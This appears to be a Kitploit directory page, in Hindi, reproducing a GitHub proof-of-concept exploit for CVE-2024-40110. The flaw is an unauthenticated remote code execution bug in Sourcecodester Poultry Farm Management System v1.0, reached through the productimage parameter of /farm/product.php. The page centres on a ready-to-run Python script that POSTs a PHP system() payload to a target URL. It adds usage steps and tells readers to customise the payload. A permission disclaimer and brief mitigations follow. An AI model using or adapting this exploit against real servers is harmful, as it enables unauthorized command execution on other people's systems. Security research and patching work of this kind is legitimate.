Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-40110 — प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट अप्रमाणित रिमोट कोड निष्पादन के लिए Sourcecodester Poultry Farm Management System v1.0 में productimage पैरामीटर के माध्यम से। | Kitploit
उपकरण/GitHubGitHub/abdurahmon3236/cve-2024-40110
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubabdurahmon3236/cve-2024-40110

CVE-2024-40110

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट अप्रमाणित रिमोट कोड निष्पादन के लिए Sourcecodester Poultry Farm Management System v1.0 में productimage पैरामीटर के माध्यम से।

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Sourcecodester Poultry Farm Management System v1.0 में बिना प्रमाणीकरण के रिमोट कोड निष्पादन के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC)

यह रिपॉजिटरी Sourcecodester Poultry Farm Management System v1.0 में एक बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) कमजोरी को प्रदर्शित करने वाली एक प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट प्रदान करती है। यह कमजोरी /farm/product.php पर productimage पैरामीटर में मौजूद है, जो एक हमलावर को सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देती है।

विषय-सूची

  • कमजोरी का विवरण
  • सेटअप और उपयोग
    • PoC स्क्रिप्ट
  • महत्वपूर्ण विचार
  • शमन उपाय

कमजोरी का विवरण

CVE-ID: (लंबित)

अवलोकन: Sourcecodester Poultry Farm Management System v1.0 में /farm/product.php पर productimage पैरामीटर के माध्यम से एक बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) कमजोरी मौजूद है। यह कमजोरी एक हमलावर को बिना प्रमाणीकरण के सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देती है।

प्रभावित संस्करण:

  • Sourcecodester Poultry Farm Management System v1.0

सेटअप और उपयोग

आवश्यक शर्तें

  • Python 3.x
  • requests लाइब्रेरी (pip install requests)

PoC स्क्रिप्ट

यह स्क्रिप्ट दर्शाती है कि कैसे एक हमलावर कमजोर पैरामीटर पर एक दुर्भावनापूर्ण अनुरोध भेजकर RCE कमजोरी का शोषण कर सकता है।

निम्नलिखित स्क्रिप्ट को rce_poc.py के रूप में सहेजें और इसे चलाएँ।

root@kitploit:~
import requests

# Configuration
target_url = "http://target-url/farm/product.php"  # Change this to the target URL

# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"

# Construct the malicious request
data = {
    'productimage': payload  # The vulnerable parameter
}

def exploit_rce(url, data):
    """
    Exploit the RCE vulnerability by sending a malicious request to the target URL.

    Args:
        url (str): The target URL.
        data (dict): The data to be sent in the POST request.
    """
    try:
        response = requests.post(url, data=data)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully executed the payload.")
        else:
            print("[-] Failed to execute the payload.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Sending malicious request to: {target_url}")
    exploit_rce(target_url, data)

व्याख्या

  1. कॉन्फ़िगरेशन: target_url को कमजोर सर्वर के /farm/product.php एंडपॉइंट के URL पर सेट करें।
  2. पेलोड: पेलोड एक सरल PHP कमांड निष्पादन पेलोड है। आवश्यकतानुसार विभिन्न कमांड निष्पादित करने के लिए पेलोड को संशोधित किया जा सकता है।
  3. अनुरोध का निर्माण: स्क्रिप्ट productimage पैरामीटर में दुर्भावनापूर्ण पेलोड के साथ एक POST अनुरोध बनाती है।
  4. एक्सप्लॉइट फंक्शन: exploit_rce() फंक्शन लक्ष्य URL पर दुर्भावनापूर्ण अनुरोध भेजता है और प्रतिक्रिया विवरण प्रिंट करता है।
  5. स्क्रिप्ट चलाएँ: निष्पादित होने पर, स्क्रिप्ट RCE कमजोरी का शोषण करने का प्रयास करेगी और परिणाम प्रिंट करेगी।

महत्वपूर्ण विचार

  • अनुमतियाँ: सुनिश्चित करें कि आपके पास लक्ष्य प्रणाली पर इस कमजोरी का परीक्षण करने की स्पष्ट अनुमति है। अनधिकृत परीक्षण अवैध और अनैतिक है।
  • परीक्षण वातावरण: उत्पादन प्रणालियों पर प्रभाव से बचने के लिए इस परीक्षण को नियंत्रित वातावरण में करें।
  • पेलोड अनुकूलन: वांछित कमांड निष्पादन प्राप्त करने के लिए आवश्यकतानुसार पेलोड को अनुकूलित करें।

शमन उपाय

इस कमजोरी को कम करने के लिए, निम्नलिखित कदम उठाएँ:

  • इनपुट सत्यापन: उपयोगकर्ता इनपुट को स्वच्छ करने के लिए उचित इनपुट सत्यापन लागू करें।
  • फ़ाइल अपलोड प्रतिबंध: फ़ाइल अपलोड को केवल विशिष्ट फ़ाइल प्रकारों की अनुमति देने और आकार सीमाएँ लागू करने के लिए प्रतिबंधित करें।
  • सॉफ़्टवेयर अपडेट: सुरक्षा पैच और सुधार लागू करने के लिए अपने सॉफ़्टवेयर को नियमित रूप से नवीनतम संस्करण में अपडेट करें।

इन शमन उपायों और सुरक्षा सर्वोत्तम प्रथाओं का पालन करके, आप Sourcecodester Poultry Farm Management System v1.0 में इस RCE समस्या जैसी कमजोरियों को रोक सकते हैं।

टूल डाउनलोड करें